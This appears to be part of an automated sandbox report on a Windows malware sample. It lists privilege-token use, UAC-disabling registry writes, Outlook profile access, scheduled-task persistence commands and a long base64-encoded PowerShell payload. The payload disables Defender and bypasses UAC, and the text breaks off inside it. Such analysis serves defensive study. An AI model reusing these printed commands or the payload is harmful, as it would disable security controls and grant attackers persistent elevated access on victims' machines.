| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs net.exe
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WinDefend.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Infected.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Users\Admin\AppData\Local\Temp\e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944.exe
"C:\Users\Admin\AppData\Local\Temp\e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\Infected.exe
"C:\Users\Admin\AppData\Local\Temp\Infected.exe"
C:\Users\Admin\AppData\Local\Temp\WinDefend.exe
"C:\Users\Admin\AppData\Local\Temp\WinDefend.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\Admin\AppData\Roaming\Loader.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5CC6.tmp.bat""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\Admin\AppData\Roaming\Loaader.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5DB0.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\Admin\AppData\Roaming\Loader.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\Admin\AppData\Roaming\Loaader.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\Loader.exe
"C:\Users\Admin\AppData\Roaming\Loader.exe"
C:\Users\Admin\AppData\Roaming\Loaader.exe
"C:\Users\Admin\AppData\Roaming\Loaader.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8